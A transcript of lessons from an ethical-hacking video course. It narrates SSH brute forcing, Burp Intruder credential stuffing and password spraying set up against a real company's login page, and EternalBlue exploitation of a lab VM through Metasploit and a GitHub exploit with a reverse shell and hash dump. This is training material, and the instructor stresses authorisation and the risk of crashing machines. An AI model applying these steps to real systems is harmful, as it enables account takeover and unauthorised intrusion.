different options here that we can utilize but we're gonna go ahead and do the same kind of thing we're going to say set user name and we're just going to say root and then we're going to say set pass file and similar to what we just used we're going to say user share wordless metasploit and then we're going to say linux unix sorry unix passwords and that should set the pass file and then we just need our host as well set our hosts and we'll say 192.168. 57.134 say options one more time and you can see that we've got our password files set we've got our our host set we've got our our port on 22 threads is one username root and we should be good to go now we can set multiple threads here we could set threads to like 10. this is really going to amp it up i mean this should be detected in a second but we're going to try to run it and we could set actually let me control c let's set verbose to true as well just so you can see that it's actually working except verbose to true and then we're going to run this and then it's going to attempt different credentials here and it'll say hey i found it and it'll light up green and then we'll know it's good so this is actually going kind of slow surprisingly and you can see here that we are at attempt 112 116. so this is all also going slow um and we do not have a successful attempt or a login i actually don't believe that there's going to be one but you never know um i believe i remember taking this offline and trying to crack the password and it wasn't any kind of weak password so you can let your brute force run if you want to go with it but i'm going to go ahead and kill mine and that's it for this video so from here we're going to talk about a similar methodology called credential stuffing which we've already talked about before except we're not brute forcing but we're using common knowledge to our advantage so we'll talk about a little bit of credential stuffing in the next video let's talk again about credential stuffing and while we're at it we're going to talk about password spraying now i realized we talked about this earlier in the course with breach parts and we leak info but i do think that hammering concepts over and over and how important they are does help for information retention so again if we look at this example here what is credential stuffing well it's just injecting breach account credentials in hopes of account takeover so if you look at the compromise server here in the upper right hand corner we pull down usernames and credentials and we get these from leaks like the linkedin link or the equifax link or whatever those have come out recently we get these leaked credentials and we grab these databases we search through them like we did with breach parse or like we can with we leak info and we get these stolen credentials and we take these credentials and we try to pass them to the site login now we can take a look at a real life example of that which i have pulled up here and again this is just an example of the tesla breach parse so we have some usernames and passwords we have repeat offenders remember we also have similar passwords here but the art of credential stuffing is taking these passwords and these usernames and throwing them at a website that's all it is so we're gonna throw them at a website and just kind of spray and pray now i just gone ahead and opened up this same tesla dash master i've only opened up the users and the passwords just for an example of spraying this video is going to be in theory only i don't want you attacking tesla's website so just take this for example you can follow all the way up until the point that we actually hit attack if you want to follow along but for this please do not attempt an exploit against tesla you do not know when the criteria is going to change and i just don't want you getting in trouble just in case it does so from here i'm going to go ahead and go to firefox and while we are in firefox what i want to do is i want to take a quick pit stop and go to google and i want to look up something called foxy proxy so go ahead and do this look up foxy proxy like this not froxy foxy proxy and go ahead and click on this top one here the standard and we're just going to go ahead and install the standard to our firefox and this is going to be a useful tool that we'll be using throughout the course so okay we've got foxy proxy installed now what has happened up in the right hand corner we've got this here you can see foxy proxy's here and we can just say hey options and in the options we're going to add in a proxy over here on the left and we're just going to call it burp suite and then over here we've got proxy types we're just going to leave this at http and then we're going to give it an address which is 127.0.0.1 same thing as before and again this is 8080. we'll just hit save and then we're going to go ahead and close out and then all we got to do now is click this and click this and now burp suite's turned on super simple so let's go ahead also to our applications and let's just go up here and open up burp suite and let's test out our proxy and make sure ignore the errors don't worry about those let's go ahead and hit next and use burp defaults and i will give you a second here to catch up because i realize that i might be clicking through a little fast so once you have everything set up like this what we're going to do is we're just going to make sure our proxy works so i'm just going to refresh the page and you can see that it worked so easy on easy off that's all we're looking for here instead of having to go in the menu and go to preferences and you know go through that whole process all we got to do is click a little button we can turn it on or off within a couple clicks so from here i'm going to turn the intercept off and we're just going to go ahead and go to tesla.com and tesla should look like this when you go to it in the upper right hand corner there is a sign in button go ahead and click sign in and again this is just a watch and learn exercise you can follow along up until the point that we fire the attack there will be opportunities here in very very soon videos where you actually get to do this and you can practice along so from here let's turn on the intercept and let's go ahead and just put a fake email we'll just do test at tests.com and we'll do test as the password and hit sign in and that intercepts here so you can see the user equals or email equals test at test.com and password equals test we're going to go ahead and just right click this and say send to intruder and from intruder what we're going to do is we're going to go to positions in here and then we're going to clear it all those green go away because it tries to auto select positions for us so now what we're going to do is we're just going to highlight this here and we're going to say add and then we're going to highlight this here and we're going to say add so we're selecting two different parameters we're selecting the email parameter and we're selecting the password parameter and now we have different attack types up here the most common that we're going to use is either sniper but sniper uses one parameter so we're actually going to use what is called a pitchfork here and we're going to go ahead and go over to our payloads and what we're going to do or what i'm going to do is i'm going to take this list of users and i'm just going to copy this i'm going to paste it and then on the second one i'm going to take my list of passwords and i'm going to paste it now what this is doing if we go back payload set 1 is all the usernames it's going into the first one we set here payload set 2 all the passwords those are all going into here and we have 30 total counts meaning what's happening with this this pitchfork is payload one number one is corresponding to payload two number one so they only run together so this will run the username and password these are just the separated users and passwords this will run this username against or against this password here so what we're going to do is just restart an attack and it just says hey this is a demo version of intruder because you're on community don't worry about that it still runs it's just a little slower i'm going to go ahead and hit pause on the attack now there are some interesting things that we can look for when we're doing this what we're looking for is a status code change of some sort maybe we see 200s here and we want like a 301 which means a redirect or we see a significant change in length that would be a good indicator that maybe we had a successful login other items too is that we can click in here and look at the response and we can say okay what did the response say and if we scroll down maybe it said something in here about fail login okay we could not sign you in and we could just take we could not sign you in like this copy this and then we can come back we'll close this attack we'll come into options here and there's actually a grep feature so we can remove we can clear all these in this little box we can just paste this and say yes match match this here so watch what this does so we're going to start this attack again and then i'm going to pause it and you can know immediately look at the check boxes this means it's showing up in the response it's grepping it out it knows immediately that we didn't sign in successfully so this is an example of a credential stuffing attack so we're looking for these few different things a status change a significant length like we're seeing all the same kind of links here but what if it was like 5000 or 2000 or 15 000 if the page length changes there's a good chance that you signed into something and we have a successful login same thing here with this if you can find your error code or what it says and then grep on that then you can click up here and just sort by that and you can search for the ones that don't return that and possibly have a login as well so this is the art of credential stuffing now let's say we wanted to close this out we want to go back and we want to do password spraying well we're going to go ahead and just clear this out and if you remember password spraying is the art of using known usernames without a known password so we'll just say add here and we would gather a list of all the possible users that we can think of we can look at hunter.io we can look at you know the breach password list we can look at linkedin and gather people who work there come up with this big list and then actually clear sorry um no this is right we'll add these and we'll have all the different users and then for this we'll just change the request to like fall of 2019 or we can set it up to we could set this up here like fall 2019 exclamation or whatever the time frame is or however you want or maybe you know they work at tesla so maybe we'll do tesla one if they have a weak password policy or one two three or at sign or pound you just try a few of these the only downside to this is you are most likely attacking active directory accounts when you're attacking active director accounts you want to be very careful because you could lock them out without even trying so if you're doing a pen test the best idea is to ask before you attack say hey how many attempts do you have unsuccessfully before a logout happens or a lockout happens because the worst thing you want to do is fire off 10 of these in a row lock out a bunch of users and cause a denial of service that is very very possible and very very easy to do so make sure you're not just firing these willy-nilly that you have a good idea of the password policy the lockout policy etc that'll really help you when you do these attacks but you just want to do these kind of one or two at a time wait a few hours fire another one or two at a time and you should be good to go okay so same deal here we could fire this and we could just say you know i'll just say password one two three and we'll just switch this to sniper here if we come to the payloads you can see it just kept the emails there is no payload too anymore so what this would do if we hit start attack is it would start firing this against this email address with a password of one two three and then this one with this email address with the password of one two three it would just go down the list and that's all password spraying is but the feature that i'm showing you here between credential stuffing and password spraying is by far the most common way that we get in on external assessments way way more than you're ever going to see just an exploit out in the wild where you're going to see this most likely and second you're probably going to see something like default credentials so if you see a login page always check default credentials because you never know you're likely not going to see a exploit out there because the chances are one is that if you see an exploit like that out there who knows who else has seen that already what kind of bad actors because bad actors are scanning the internet all the time for these sorts of things and if they're seeing it then guess what you know if you're seeing it then guess what they're probably already seen it as well so that's a bad situation two you got to think of protection and clients just think of clients like a house when you talk about the external of your house your external your doors have really good locks on them you might have two locks on your door you might have good lighting all this other stuff right like to try to keep bad guys out but on the inside some of your doors probably don't even lock and that's really how you can treat an external assessment the clients do a really good job of you know buffing up their external but when it comes to the internal it's not usually as good so same thing with physical assessments as well you just gotta you gotta get inside once you're inside it's kind of easy breezy for the most part so take that lesson away if anything you take from the course again at least for the external side take away that enumeration and information gathering super important because you want to get to this stage here where you are doing these credential stuffing attacks and you can use burp suite for it this is my favorite go-to there's other methods as well but it's so easy just to grab any different website and just you know intercept the proxy send it to intruder make one modification and fire it off so super super simple this is something you will come up in an interview as well so make sure you're very aware of it and make sure you watch this again if you need to understand the concepts so from here we're going to go ahead and take a quick look at our notes in the next video just kind of where i want you to be with your notes and then we're going to get into what i call that mid-course capstone where i'm going to show you a bunch of different hacks and just my thought process and theories in thinking when i go into a scan and looking at results and just so you can kind of get into the mind of an attacker and how we think and then we'll start moving on to exploit development and my favorite the active directory exploitation so i look forward to seeing you in the next video let's briefly cover our notes so far so we have covered a little bit of this right we covered the fact that we have our nmap in here and what we saw in port 22 port 80 etc and we had a couple of findings from before we had default web page on apache and we had this information disclosure as well um now we've done some exploiting so i've gone ahead and just put in here i put the smb exploit so i put an example of what it looks like when we run it and you can see that the who am i and the host names in there and then i've got the ip address this is just for my notes you can make this as detailed as you want by the way you could say hey i ran this at this specific time and i ran it against this host and here was the attack i ran etc and we'll get more into what your report should look like but as long as you know at least for me as long as i know where i have a screenshot of proof that i did it and i have the ip address that i ran it against that's pretty much enough i can remember the rest and then type out the report and same here with the mod ssl attack on port 80 and 443 and i don't have a copy of it right now but the shadow file we did uncover the shadow file as being a root user so this just notes for us perhaps we could use the shadow file information and crack the passwords or we could go on and try to pass the password or pass the hash around which we'll get to in later videos and another thing that i added in here too was undetected malicious activity so this is something that you're going to see on a report and we talked about in the uh the brute forcing video where if we're doing any kind of brute forcing we're doing it not only to see if we can get in with a bad password but to see if the client catches us so in this example i'm just going to say hey they didn't catch us here's an example of what we did also scanning in there as well if they're not seeing a scan that's something that we're going to report back so this would be typically a low fining these would also be low findings anytime we get access to a machine this is obviously a critical finding so we just want to keep note of you know what kind of things we're finding take good pictures etc so i'm hoping that you are getting the gist now of what your notes should look like again make these your own however it feels good to you this is just how i kind of do it i don't have to put a ton of information in there for me to remember as long as i have my screenshots which are most important because that's your proof that you were actually there and you did it otherwise it's just he said she said kind of thing so that is it for this video that is it for this section congratulations again for making it this far now we're going to move into some of the fun stuff where we get to look at a bunch of different attacks and gradually just get a little bit more complex and learn some new things along the way and i like to call this a capstone because we're capping off where all the things we've learned so far and we're gonna actually build upon it too you're gonna learn a bunch of new little techniques as we do this little mid-course capstone and then we're gonna get into really fun stuff once we get into active directory i'm really excited for that so i will catch you over in the next section welcome to the course capstone this is the 2021 edition of the course capstone and we'll get into the old capstone the new capstone and what the differences are but the course capstone is meant to challenge you and test your skills and knowledge up to what you've learned so far now not everything is cut and dry these boxes are not meant to be particularly easy they're actually meant to be learning experiences so what that means is you are welcome to go through these machines on your own give them a try i realize that we have not talked whatsoever about privilege escalation we have not talked about a lot of the tools that you're going to see and this is by design hacking is not going to be able to show you a course on hacking something will show you everything but you're going to get to pick up some ideas and a little bit of googling a little bit of frustration and really just getting in there getting your hands dirty and seeing what you can come up with so i encourage you to try these on your own in the order that they're listed however if you want to just watch and follow along that's absolutely okay as well now i mentioned privilege escalation but we'll talk about that here in a second i want to show you the old course capstone and where the new course capstone is so i have uploaded the new course capstone this is not all the machines yet this is just the ones that i started uploading all you got to do is go in here and download these machines you can run them with vmware or virtualbox i've got setup instructions for a couple of the machines once you've seen one windows or one linux you can see them all and how to how to download them and run them so that's pretty straightforward the link will be provided in the resources or in below the video depending on what platform you're on now the old capstone here's the old capstone i have not pushed the new update yet so this is what the old capstone looks like you could see there were 10 boxes there were five hours of material or was five hours material the issue with the old capstone was that we were relying on a platform called hack the box hack the box was a paid subscription platform it costs anywhere from 10 to 15 a month i'm not sure exactly the the true cost but i realize not everybody can pay additional funds to go and use this platform to walk through these machines so what we have done is we have made these machines available via youtube so i'm going to put this down below as well but there is a series originally released called pen testing for noobs if you look all 10 of those machines are going to be here as well so you're welcome to come to the youtube channel and watch these videos if you want extra content extra walkthroughs in more of the practice and more of the capstone you're welcome to go sign up for hack the box do all that but we are removing that dependency from the course now these machines are going to require what is called privilege escalation we are going to walk through privilege escalation what i mean by that is i mean that we are looking at a box when we land on the machine we are not root or we are not system on that machine we are a low level user we have low privileges and we need to escalate our privileges to the highest level that we can so all of these machines except for one at the time of this recording are going to have some sort of privilege escalation involved now you're going to get to see some cool tooling some different techniques and tactics but it's not going to go into super depth on this there are courses out there that we have created we have two here the windows privilege escalation for beginners and linux privilege escalation for beginners if you are on udemy if you are on the academy same concept windows and linux just depending on the platform you're on and which one you you prefer so if you're interested in going after any sort of certifications if you're interested in doing any sort of capture the flag or getting better at just escalation in general highly recommend these courses if you're looking to stay kind of on that practical path then these aren't really necessary it's really based on chasing certifications in the hacking realm like your oscp or some of the other certifications that might be out there they use a lot of privilege escalation to test on but again it's not really on the practical side of things so depending on what your motivations are and reasoning however we are going to show them in this course only because they are a good introduction to hacking it's good to see the other side it's good to see some of the the exploits that are out there some of the thought processes that are out there and then once we get into the active directory section it'll really take off from a practical standpoint and we're really going to start hacking like we are hacking in a real network and it's going to get really fun it's my favorite section in the whole course so with that being said go through the courses again in order as you see them so however you see them in the list go ahead and go through them we're going to add more courses over time as of right now the dependency is that you download these and install these for your lab again there will be instructions for those in later attempts we are hoping to offload these to an online lab unfortunately we won't be able to do that with udemy but with the academy platform we should be able to do that so we're working on getting that but for now the google drive link that you see attached to the introduction video this video will have all the files that you need to download in order to complete this section so with that being said go ahead and complete the next box i'll see you in the next video and hopefully you rooted it so before we begin the capstone i want to show you how to import a machine and i'm going to show you starting with blue how to import blue which is a windows machine and then we're going to go ahead and import a linux machine in a later video so that way you should know how to do both though the process is exactly the same so for blue what we're going to do is we're going to come into vmware here and i'm going to show you virtualbox as well we're going to go open virtual machine and you're just going to select the file that should be available to you here which is blue i've already done that through the magic of editing so it's already here and i'm just going to go up here and show you that we'll get to settings here in a second for virtualbox same exact process i'm going to go ahead and just go to import i'm just going to paste the location in here you can also use this to go find your file and i'm going gonna hit next and import okay and it should start importing this file so here we go it's importing it'll take 50 seconds that's fine gives me time to talk about the settings so you can see here that we are in bridged mode okay we don't want to be in bridge mode let's go ahead and edit this go to bridge and we're going to turn this into actually just nat now you can choose how much memory you want to use here mine set to four gigs that's fine i've got a lot of ram if you do not then go ahead and maybe turn this down to two gigs would be absolutely fine okay so i'm gonna hit okay here now i'm gonna power on this virtual machine and then we're gonna wait for the other one to finish importing which it has so here while we're waiting on this go ahead and go to settings and you're going to want to do the same thing so network no bridge don't do bridge we're going to do nat okay and then we're going to just enable the network adapter here so you should have your nat network set up remember that when you you did that originally with our settings if you need to you can go back to tools you can go to preferences come in your network make sure your net network is set up anyway come in here you can go to your settings and again make sure that this is on nat so or nat network i apologize nat network right here okay and then i'm going to hit ok and then all you need to do is power this on i'm gonna show you with the virtual or the vmware it's gonna be the same process now you can log in as the administrator you're gonna get credentials for every box that is for the sole purpose that you can access the ip configuration and find the ip of this machine okay just to make it a little bit easier so there will be an accounts file in here and here you can see the administrator password is password 456 exclamation so we're just going to do that and we're going to make sure that this box is online and that we can communicate so i'm going to quickly go to command and you can install vmware tools if you want make this pretty all that jazz i'm not going to do that here i'm just going to quickly figure out what's what's what you can see 192 168 138 135 i'm going to come over to kali linux i've got a scan that we did for 134 up but that's okay i'm just going to ping 192 168 138 135 okay and you can see i'm getting a response back and that's it you need to make sure that you can communicate with your machine so if you're running virtualbox make sure you spin it up you log in you figure out what it is that your ip address is and go from there very very straightforward so that is it for this video go ahead and attempt to attack blue see if you can figure out what the deal is and where you can go and how you can exploit it and meet me in the next video once you've attempted it to see if you were able to successfully root or system this machine thank you so let's start by taking a look at our nmap scan now the ip address i got was 192 192.168.138.135 and not a lot of ports came back so we got 445 back and we can scroll through get a little bit of information like we see a netbios name on this machine we see that it's running windows 7 ultimate 7601 service pack one doesn't appear to be part of a domain just a work group same thing work group authentication level user and really there's nothing here that is a big indication as to what this could be um so when we have this as we discussed before when we're looking at uh smb specific vulnerabilities because that would be my guess here would be the the vulnerability would be smb related we need to enumerate smb in one of two ways really the first of that being well can we search based on version information that we see here can we search on this and see if there's anything vulnerable that could be there second of all if we can't find anything right off the bat for this maybe then we can go and use something like smb client do some enumeration maybe there's a null session we can connect to maybe there's a file or something some sort of information with a username or password or something along those lines that gets us into this machine otherwise we're pretty much stuck with uh version information okay so we're gonna go ahead and just copy this and there's a reason that this is the first machine in our run-through of the capstone because this is the easiest or should be the easiest so we're going to go ahead and go out to firefox and i'm just going to go google.com come in here we're going to search for this and we're going to search for exploit it already knows me and we can look through some of these and see if there's anything here that really stands out first thing for me um we've got we've got a few we got one here uh one here these just kind of say they don't necessarily say what they are so we might need to click into them uh ms17010 keeps popping up quite a bit um let's see if it tells us anything here about architecture uh really doesn't just shows up as this so we'll have to do some reading into this this is a local privilege escalation doesn't really help us because we're not doing privilege escalation at this point we're just looking to see if we can even get on this machine okay this shows us hey ms-17010 this is a exploit for it written in python it looks like and it says hey okay this could be our our target so we're going to take two different paths here we're going to look at it first in metasploit and then we're going to take it from a manual path and we're going to see if this is indeed what we're after so let's go ahead and just go to msf console and yours might look a little bit different than mine depending on what version of cali you're euron but the process should be the same i'm on msf5 so we're going to go ahead and just search eternal blue and i do know recently they combined all the eternal blues into one so again yours might be a little bit different than mine but it should be the same process or concept now the first thing we want to do is we want to look up this smb scanner right we want to do an auxiliary our auxiliary modules are going to tell us what is there it's going to be a check it's not going to be so much an attack it's more of scanning than anything else there are some attacks in auxiliary modules but they're not full on exploitation so let's go ahead and just say use one and we're going to go options in here and all it's going to do for us is it's going to come in here we're going to provide it within our host we're going to run it and it's going to provide a check okay so we can just say set our host to 138 192.168.138.1 whatever your ip address is and then i'm going to say run and it says host is likely vulnerable to ms17010 okay there's a second way to do this so let's go ahead and just search eternal blue again you can also search ms-17-010 or however you want to do this it should all show up i'm going to use this number three here the eternal blue one we don't know we do know that we're on windows 7 so the windows 8 won't work for us and ps exec we could run but i'm going to go ahead and just use the one that is most popular and works usually out of the box so let me go ahead and just say use three and type in options and in here we have a verify option which means we should have a check option here so i'm gonna again just say set our host i'm gonna show you the check feature one three eight one three five okay and then i'm going to say check all right and so check did exactly what the auxiliary module did for us it says hey it's vulnerable okay they're likely vulnerable so what we need to do is we need to set a payload here now something that you might not know yet at this point is that payloads are by default they are set to 32-bit at least in this this example because there could be a 32-bit exploit in here actually this says 64-bit so i could be lying to you um some some payloads are set to a 32-bit to start because we know that this is a 64-bit machine or at least should be given that it's enterprise we're gonna go ahead and set this to 64 bits just to be safe so this is a practice that i take on if i know the architecture of the machine i'm going to go in here and set my payload for myself now this should be 64-bit but just to be safe we're going to type in windows and hit tab because it only auto-completes to 64-bit this is perfect now i think where my mind was going is that i want this to be an interpreter shell and i don't know if it defaults to merterpreter it might default to a reverse tcp of some sort so we're going to go ahead and use a interpreter shell because we want a nice interface to to have so i'm going to go ahead and set that options one time and i'm going to look at the l host here and we could just say set lhost over to we could just call it eat zero or you could set your ip address in here again you can ipa or ifconfig and whatever your ip address is i'm running on eat zero so whatever your whatever you choose you could place here as well so i'm gonna go ahead and run this now while this runs this might not work on the first go it might not work on the first few goes this is to try going through what are called different sets of grooms on here and it looks like it worked right away but sometimes this doesn't work right away and if yours doesn't work right away that's okay it might take a few attempts through this first process and you might have to hit run a few times for this to go now i have chosen using blue or eternal blue for this course because it's so relevant this is a four year old exploit now and i see it on so many internal penetration tests it's not even funny like i wish it would just go away but it is this easy to run and just get on a machine and gain access and it's incredibly easy and incredibly prominent in environments think about environments where they have systems running that they can't update or do anything with and you have this or they just have poor patch management and you have this it's so easy to get a machine and then you come in here and you say hash dump and you dump out the hash and now we've got administrator hash we can go try to crack that we can do past the hash which we're not there yet we're going to get there in the active directory section you're going to see what the differences are on this kind of stuff but you can utilize these hashes to our advantage and we're going to play around with that a little bit later in the course so with that being said this is something that you will likely see if you do become a pen tester you'll see this in an environment and it is really this easy to get into a machine like this so we have used this now to come through here and gain access we're going to go ahead and go back and we're going to try doing it again but we're going to do it through through a manual method so i'm going to open up a new tab all right and we're going to come in here and i'm going to search google now if we want to go look for manual methods of exploiting a system we're likely going to use github perhaps exploit database now this exploit database one i'm not going to use only because it gets a little tricky with eternal blue there's a few things that we have to do i don't believe this one is just one that runs right out of the box it has a little bit more information here than what's leading on now we might need to reboot this machine by the way we'll we'll give it a go and see if it works it might not work out of the box because we've already exploited um the system but we'll try anyway so we might want to do is something like eternal blue and we might want to say github okay and we can come through here and look through different ones um i like to open a few and i like to look at them and read the uh the amount of stars that they have read the descriptions that they have detailed walkthroughs um you know all these have decent stars this one doesn't have a great walkthrough um this one has a very good kind of detailed walkthrough has video tutorials uh has a decent amount of stars and i i honestly like it so we're gonna go ahead and just get the auto blue one from end game so go ahead and find that and get to this we're gonna go ahead and copy this code and there have been commits since 2021 so that's great there's recent commits to this which is awesome so i'm going to go ahead and go into i'm going to cd into opt i'm going to get clone this and that's not what i should have been copying i should have copied this but we'll try it one more time and paste here all right and i'm gonna cd into auto blue and it gave instructions in here somewhere about how to uh how to install this let's go to installation pip install requirements for python 3 which we should be on at this point so we're going to do pip install dash r requirements just like that let that install looks like everything is satisfied or installed so that's good um from here we're going to go ahead and do the usage now there was a checker in here so we can run python with the checker so i don't know it says python 2. so let's go ahead and run python 2 with it it could be python3 too so we might run into an issue checker.pi 192.168.138.135. target is not patched testing name pipes okay so this is something that i actually use on an assessment regardless if it's this or the the metasploit version i will take a screenshot of this uh there are reasons sometimes where we won't run the exploit if the environment has critical critical machines running for example like in a hospital i might not run this exploit because this can take down a machine and if i don't know what machine i'm taking down who knows in a hospital right you don't want to make that mistake so it's always better to play it on the safe side when we're running these exploits if you're if you don't know you can always ask your client say hey i've got this machine here's the ip address i want to run this exploit is that okay and get permission first now there's a lot of ways which you'll see when we get into the active directory exploitation part of the course that we can compromise the domain and we can run all kinds of exploitation own the whole domain controller and not worry about tipping over the server by any means this can tip over a server so you want to be safe with these kinds of things so with that said i'm going to show you how to run this manually but it's going to it's going to tip your box over i'm going to give the secret away it's going to tip your box over and this is going to be the lesson learned from running this exploit i'm going to show you the proper way to do it manually with the version we have it's not super easy to get a shell from the manual method we could go around and play around and find one that works but i'm going to show you this from a here's how you would run it manually but also here's the dangers of running this in an environment this is a perfect box to show you why we don't just don't go run remote code execution on machines in an environment because this can take down a machine so let's go ahead and run through the process i'm going to show you the process and then we're going to knock this machine over so first thing we're going to do is we're going to cd to the shellcode directory and we're going to run shelf prep and i'll save this now and watch the the exploit will work fine so oops we're going to go ahead and just hit yes here and then we're going to enter in our reverse connection 192.168. 138128 is mine i'm going to say 99999 for this we can do 222 for x86 we're not going to use it now we have the opportunity to use an interpreter shell or generate a regular command shell if we do the interpreter shell we can go into interpreter and we can actually run it in the sense that we use a multi-handler and pull down it's basically a listener it is a listener and it's going to pull down an interpreter shell for it so it's just the shell code that we're generating we already used an interpreter shell to get the first shell on this so now we're going to go back and we're going to go ahead and try to do this with a regular command shell so you can press zero if you want to try the interpreter shell method you can also press one to generate the regular command shell method we can go ahead and just do the regular command shell uh we're going to generate a stage payload stage or stages here should crash this crash this machine um the other thing we're going to do is we're going to run this listener prep once this is all done so it's doing this for us we're going to go ahead and cd back in a second once this is done all right now i'm going to cd back and we're going to do listener prep and this is going to run a listener in medisplay for us which is nice we could just as easily run this with netcat we can just say nc and vlp like we have before nc dash and vlp like this and whatever port we're listening on all nines before so we're gonna go ahead and just let this run its course as intended and we're gonna do 99999 we did two two two two here and we're going to go ahead and say regular command shell all the same things we did before stage payload and it's going to start this up for us hopefully start up some listeners and you should see a lot of work just go in okay it's got all those listenings waiting for any sort of connection to come through so the next thing we're going to do is and it is using the multihandler for us already it's just using a shell reverse tcp instead of an interpreter reverse tcp here so last thing we're going to do is run the exploit so we're just going to say python eternal blue like this exploit and we're on seven dot pi our target is one nine two one six eight one three eight one three five path to shell code is just shell code and then sc all dot bin and we do not have to provide a number of groom connections that's optional we're going to run this and we'll cross our fingers you never know might work doesn't look like it's working uh we've blue screen the machine so this this is a perfect example of why you just don't willy-nilly run this in an environment okay so a good lesson learned honestly because if you're in a critical environment you have no idea what that machine does imagine that this was something in a hospital controlling equipment that was being used during surgery who knows if you took that down it could be very very very bad so it's good to see the other side of it again get permission before running something like this unless you know that your environment's safe it's okay to take down some machines etc but usually that's not the case so with that we're going to go ahead and move on to the next machine hopefully you got this and got through the walkthrough just fine so i'll see you in the next machine as we walk through that and hopefully take down another box okay in this video i'm going to show you how to quickly open up the academy machine in both vmware and virtualbox and how to set it up after this you should have seen a linux setup and a windows setup so you should have no more issues setting these up i have full faith in you beyond this so repeat the process if you need to go back watch the video just come back and watch one of these anyways we're going to open a virtual machine if you are in vmware i'm going to go into my folder that has it capstone and i'm going to go to academy and just double click open that up it's going to ask me where i want to put it i'm going to go default settings you can choose wherever you want i'm just going to hit import it's going to take a minute to import while that's happening i'm going to show you and you might see a retry just go ahead and hit retry on that should work while we're waiting i'm going to go ahead and show you the other side of things which is virtualbox go ahead and hit file go ahead and hit import appliance and then just go select your file i've got it for copy paste purposes it's a lot easier and vmware thinks it can just take over it's wrong so in here make sure you just have your ovf file that you downloaded hit next and then come in here and you're going to see these settings you can go ahead and just run the default settings for now and just import we'll change the settings once we have it imported so go ahead and import that on vmware we're just going to ping pong back and forth real quick under the settings for the academy go ahead and just hit edit virtual machine settings in here this is a linux machine so one gigabyte of memory is fine we don't need a lot come to your network attack adapter and make sure that it says nat and not bridged hit ok go ahead and log in now you can power on this virtual machine get that going in the next video i'm going to show you the password which is just a root tcm same thing here on the academy go ahead and go to settings we're going to go to network make sure your nat network is selected remember we created in that network make sure your nat network is selected and that you are on the same network as your kali linux machine or you will not be able to communicate with it so with that out of the way you can go ahead and power this on depending which one you're on catch me in the next video when we will talk about logging in finding the ip address and getting started with attacking this machine i'll catch you over in the next video all right on to the next machine this one is called academy and this was created by alec especially for us now we're going to attack this machine and we're going to get a low-level user we're going to pivot into a second low-level user and then we're going to root this machine if you did not root this machine do not stress about it these boxes are meant to be hard if you are a beginner and you are meant to walk through with us and see all these different techniques tips and tricks and just the idea and mindset as well so do not stress if you are having issues trying this on your own that's 100 okay so i have imported the machine you should be familiar with this at this point all i'm going to show you is how to log into the machine similar to what we did with the windows box now the password here the username is root the password is tcm tango charlie mike okay we come in we're going to run dh client dh client hit enter okay mine says file exists that's because i already ran this you go ahead and run it it should take a second to load once that loads go ahead and type ipa and you should get an ip address back okay mine says 192 168 138 129 yours might say something incredibly different but go ahead and go with whatever the ip address says here because that's what you're going to use now with that out of the way i went ahead through the magic of editing and ran a nmap scan you're welcome to do this as well dash capital a dash p dash dash t4 ip address nothing new at this point okay what came back for us was a few different things here we have port 21 open and we have a vs f tpd say that three times fast 3.0.3 and it says anonymous ftp login is allowed okay it says hey there's a note.txt in here okay that could be interesting now keep in mind everything that we're doing in these machines is going to be very gamified very ctf or capture the flag and that's exactly what we're doing is we're capturing the flag so don't stress about this being incredibly realistic at this point we're gonna get into the more practical stuff as we get into the active directory pen testing section we're really just trying to focus on some of the the basic concepts and some of the things that you'll see if you go do any ctf events or you go on to any other certifications or anything like that so this is a good introduction kind of jump into the the pool maybe get your feet wet first into hacking so with this in mind we've got port 21 we've got port 22 we've got port 80. now 80 is a web server 22 is ssh my strategy here when i see port 22 i immediately erase it off the board now that's not to say that it couldn't have an option of attack here you could brute force it you could go in there and try like a root username or if you knew other usernames you can go in there and just try to brute force the password and maybe you get lucky and log in usually on ctfs that is not the intended route now for things like say example a pen test you might want to brute force ssh because there's a couple reasons one is is there a weak password can i log in with a root user on a weak password for this machine if so that's bad do you tell your client hey this is bad you're using weak passwords number two you want to see if your client can pick you up meaning do they detect you when you are running brute force scans if you have 500 attempts against an ssh login and you're still able to go attempt after attempt and nothing has been detected you have not been prevented on the network then that's an issue you should probably bring that up to the client say hey i ran brute force against this login and you didn't detect me you didn't see me you didn't see me do anything we'll talk about that more in the report writing section and some of the things we talk about detection wise but that's another example of something you want to test for and see if you're detected you're testing detection throughout an entire pen test so you want to say hey did you see me scanning did you see me brute forcing did you see me running exploits did your antivirus pick me up where was i caught during this pen test and where can you improve so something about ssh a little tangent there but with that out of the way port 21 is open port 80 is open now we see down here that it says hey we're getting an it works page which means that it's just a default apache 2 web server we can go out to this web server and just take a look 192.168.138129 you can see this is just a basic hey it works apache 2 debian page that tells me that we're likely running on php on the back end though that doesn't mean that entirely this is just kind of an indicator when we see apache i'm assuming php on the back end so let's go back here now we could do a couple things we need to identify what's going on behind the scenes because all we're seeing is a default web page which by the way this is a finding on a pen test so you would say hey this is just revealing too much information why do you even have this out there is this web server meant to be up if it is then take away this default web page and make it uh you know make it say hey if you're not supposed to be here then don't be here anything but a default web page because all we're seeing is architecture here if it's not supposed to be there from a hacker's perspective this means poor hygiene you're just leaving ports open you're just throwing computers on the network and on the internet willy-nilly and this just means that you likely have poor hygiene and we want to look into you further because if this is something you're doing you might be using bad passwords or not patching etc etc so anyway off that tangent going back to the scan i'm curious to know what the note says we'll go check that out we have anonymous login so we'll start there and then we're going to go ahead and take a look at the different pages that could be hiding behind the default page so i'm going to leave this up and now we're going to go take a look first at the ftp so in here i'm going to make this bigger okay so ftp all you got to do is 192 168 138 129 or whatever your ip address is and then i like to just type anonymous twice okay we get an anonymous login we are successful we can come in here and say ls all right and we have a note.txt in here so all we need to do is type in dot getnote.txt that's it and we're pretty much done so the option here is we have ftp open now there's a possibility that we could utilize this so we have the ability with ftp to put files and get files we just got a file we can come put something on here the only issue is we don't know where on this machine that this note.txt is stored if for some reason this note file was stored in like the i don't know this apache server if we came in here and we just went like forward slash note.txt and we saw it all right then that could be of interest because we know the directory that we're in we could come in here just upload malware come up here execute the malware because we have execution and then we could get a shell and keep pushing forward but in this instance we don't know where it is it's there's a good chance it's not even in the web server if for some reason it wasn't the web server we could use that to execute and that is a strategy that we might see at some point but here in this instance unless i know where this is the ability to put files in here does nothing for me in a real world scenario maybe maybe we can go look at uh getting social engineering or getting somebody to open a file or or something along those lines but for here for this capture the flag type style we are only focused on getting this note and that's pretty much it also secondary finding on a pen test would be this because we see apache 2.4.38 it's telling us it's running a debian server which means we're attacking linux so if we were doing this blind didn't know that now we know we know the apache version we know debian we're getting a little bit of information and we're just compiling that information right now debian server apache php most likely okay all of this is information gathering that's all we want to 